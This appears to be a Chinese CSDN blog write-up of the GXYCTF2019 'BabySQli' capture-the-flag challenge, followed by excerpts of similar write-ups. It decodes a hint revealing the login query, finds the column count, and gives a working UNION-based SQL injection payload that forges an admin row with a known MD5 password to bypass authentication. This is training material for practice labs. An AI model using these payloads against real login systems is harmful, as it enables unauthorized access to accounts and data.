[GXYCTF2019]BabySQli

最新推荐文章于 2024-05-06 15:38:36 发布
最新推荐文章于 2024-05-06 15:38:36 发布
阅读量2.8k 收藏 3
点赞数 3
分类专栏: CTF刷题记录 文章标签: 安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/113812068
版权

[GXYCTF2019]BabySQli

题目描述:

buu上的,题目链接

解题过程:

首先试了试,发现有提示

MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5

先进行base32解码,得到

c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==

再进行base64解码,得到提示

select * from user where username = '$name'

好了,有了提示,然后fuzz一下,发现了一些东西

发现or,order,information_schema被过滤,但是order可以通过Order来进行绕过。

 name=admin'&pw=1  报错

name=admin'#&pw=1  回显wrong pass

通过

name=admin' Order by 4#&pw=1

回显:Error: Unknown column '4' in 'order clause'.

name=admin' Order by 3#&pw=1

回显:wrong pass

 可知字段数为3

接下来就是本题的考点了

本题考点:联合查询所查询的数据不存在时,联合查询会构造一个虚拟的数据

本地复现:

首先创建一个库,里面有users这个表,先写进几个初值,

然后进行联合查询

会有这样的结果,但是如果你再次刷新该库,数据并没有保存。(我认为这就是大佬们说的构造虚拟的数据,如有错误,欢迎指正)

name=1' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b'#&pw=1

 其中'c4ca4238a0b923820dcc509a6f75849b'是1的md5加密值。

 

相关链接:

1.发现了Y1ng师傅的博客地址

Sk1y
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
GXYCTF2019--BabySQli
Oavinci的博客
06-28 720
知识点: 查询数据不存在时,联合查询会构造一个虚拟的数据在数据库中。 随意输入点击登录,查看源代码得到一串字符串 base32+base64解码得到: select * from user where username = '$name' fuzz一下发现过滤了一些字符串。首先大写绕过"Order by 3#",查询列数为3,猜测为id,username,password。 这题考察的是用户名和密码分开检验,先将username对应的字段查出来后,再检验password和查出来的密码能不能
[GXYCTF2019] web题-BabySQli
BROTHERYY的博客
07-13 602
复现环境:buuoj.cn 查看页面源代码发现有个search.php,访问这个文件以后发现有base32编码 在网上对其解码后得到 在登录发现存在账号admin,使用联合查询 联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。这时候直接在pass框里面输入e10adc3949ba59abbe56e057f20f883e的md5解密结果就可以了。 flag{360b0328-2477-4a68-801b-4f3fed8217a0} ...
GXYCTF2019BabySQLi wp
Luminous_song的博客
09-28 294
打开容器后发现,只是一个登录页面 这种登录一般都是admin为用户名,再随便输个密码,发现出现wrong pass打开源代码,发现一行注释 <!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5--> 先用base64解密一次,发现是乱码,再用base32,解出来出现两个等号,有base64的特征,再次用base64解密,发现 select * f
[GXYCTF2019]BabySQli 1
最新发布
qq_44724114的博客
05-06 454
4. 用union联合注入,不知道是不是hackbar的问题,说我的sql语法有错,用bp抓包,修改就没问题(百思不得其解)。202cb962ac59075b964b07152d234b70这个是123通过MD5解密而来的数据。要注意 name=1’不能写成=admin’ 这样会查询到两个admin账户,要使只有我们现在查询的admin,只能union前面查询的数据没有显示才行。再一次进行base64解密,得到sql语句。进行一次base32解密。
[GXYCTF2019]BabySQli1-BUUCTF
chinese_cabbage0的博客
02-05 891
主要是一个buuctf题目的解题过程,大家可以参考一下
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2699
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
[HarekazeCTF2019]baby_rop2
m0_52231248的博客
11-16 892
[HarekazeCTF2019]baby_rop2 Checksec: Ida: 很容易看到read存在溢出,offest=0x28 程序中没有system函数和sh字段我们要用ret2libc绕过nx保护 程序中存在printf函数我们用它来泄漏libc基址 先找到printf需要填的rdi和rsi Exp: from pwn import * from LibcSearcher import * context.log_level='debug' r=remote("n
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
精美网页模版,橙色政府网站建设
05-09
模板介绍: 风格清晰大气,结构规整,内置工作流,信息签收、信息签发、互动交流等常用政府网站功能,相对其他模板,此模板增加了网站常用一些参数统计和投稿统计,主要功能全部采用自定义模型,可以任意扩展字段和...
C#做的超市管理系统。
11-17
《C#实现的超市管理系统详解》 在信息技术日益发达的今天,各类管理系统已经渗透到各行各业,其中超市管理系统作为零售业的重要组成部分,对于提升运营效率、优化库存管理具有重要作用。本系统采用C#编程语言和SQL ...
[GXYCTF2019]BabySQli1
m0_62706061的博客
10-17 1234
ctf
[GXYCTF2019]BabySQli 解题思路&过程
iamblackcat's blog
10-19 4745
[GXYCTF2019]BabySQli 解题思路&过程
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值